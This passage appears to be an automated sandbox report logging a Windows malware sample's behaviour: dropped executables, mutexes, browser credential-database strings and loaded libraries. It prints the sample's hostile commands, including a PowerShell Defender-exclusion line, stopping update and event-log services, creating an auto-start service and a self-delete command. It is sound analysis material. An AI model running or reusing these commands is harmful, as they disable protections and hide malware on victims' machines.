Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03

Source: C:\Users\user\DocumentsHDGDGHCAAK.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2032160732.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2032160732.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2032160732.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2032160732.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2032160732.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032160732.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2032160732.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.1847721014.000000001D8B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032160732.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2025179872.000000001D9BC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032160732.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

Virustotal: Detection: 42%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2176,i,15720693888833450956,6277082314804719392,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHDGDGHCAAK.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsHDGDGHCAAK.exe "C:\Users\user\DocumentsHDGDGHCAAK.exe"
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe"
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HYOIZPGT"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "HYOIZPGT" binpath= "C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "HYOIZPGT"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHDGDGHCAAK.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2176,i,15720693888833450956,6277082314804719392,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsHDGDGHCAAK.exe "C:\Users\user\DocumentsHDGDGHCAAK.exe"	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HYOIZPGT"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "HYOIZPGT" binpath= "C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe" start= "auto"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "HYOIZPGT"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
